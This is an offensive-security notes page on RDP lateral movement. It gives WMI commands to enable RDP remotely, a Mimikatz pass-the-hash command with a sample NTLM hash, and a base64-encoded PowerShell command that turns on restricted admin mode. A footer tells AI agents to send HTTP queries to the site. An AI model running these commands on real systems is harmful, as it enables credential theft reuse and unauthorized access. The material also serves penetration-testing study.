# Remote Desktop Protocol (RDP)

## Overview

> RDP (Remote Desktop Protocol) is a network communications protocol developed by Microsoft, which allows users to connect to another computer from a remote location.

## Using mstsc

To connect to a session in full-screen mode, type:

```powershell
mstsc /v:computer1 /f
```

## Using /admin and /restrictedAdmin

{% hint style="info" %}
Connecting to a workstation with Remote Desktop will disconnect any existing session. The /admin flag allows us to connect to the *admin* session, which does not disconnect the current user if we perform the login with the same user.
{% endhint %}

Connects you to a session for administering the server.

```powershell
mstsc /v:computer1 /f /admin
```

{% hint style="info" %}
Connecting to a workstation with /restrictedAdmin won't send your credentials to the remote PC. \
\
This mode won't send your credentials to the remote PC, which can protect you if you connect to a compromised device. Connections made from the remote PC might not be authenticated by other PCs, which impact application functionality and compatibility. The **/admin** parameter is implied.\
\
Microsoft introduced RDP with *restricted admin mode*, which allows system administrators to perform a *network login* with RDP.

\
When we supply this argument, the current login session is used to authenticate the session.
{% endhint %}

{% hint style="warning" %}
Restricted admin mode is disabled by default. 

We can enable this through the `DisableRestrictedAdmin` registries at the following path:

```
HKLM:\System\CurrentControlSet\Control\Lsa
```

{% endhint %}

## Command examples

### RDP manament through WMI

#### Checking if RDP is allowed.

{% hint style="info" %}
AllowTSConnections(0 – disable, 1 – enable)
{% endhint %}

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01 -Credential $creds 
$tsobj.AllowTSConnections
```

{% endcode %}

#### Enabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(1,1)
```

{% endcode %}

#### Disabling AllowTSConnections (RDP) through WMI

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"><strong>$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
</strong>$tsobj.SetAllowTSConnections(0,0)
</code></pre>

### Restricted admin

#### Using restricted admin to perform pass the hash.

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

#### Disabling restricted admin through registries.

{% code overflow="wrap" %}

```powershell
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
```

{% endcode %}

#### Enabling restricted admin through registries

{% code overflow="wrap" %}

```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
```

{% endcode %}

Base64 encoded:

{% code overflow="wrap" %}

```powershell
powershell -enc TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA=
```

{% endcode %}

## References&#x20;

{% embed url="<https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rfc1918.gitbook.io/offsec/lateral-movement/windows-lateral-movement/remote-desktop-protocol-rdp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.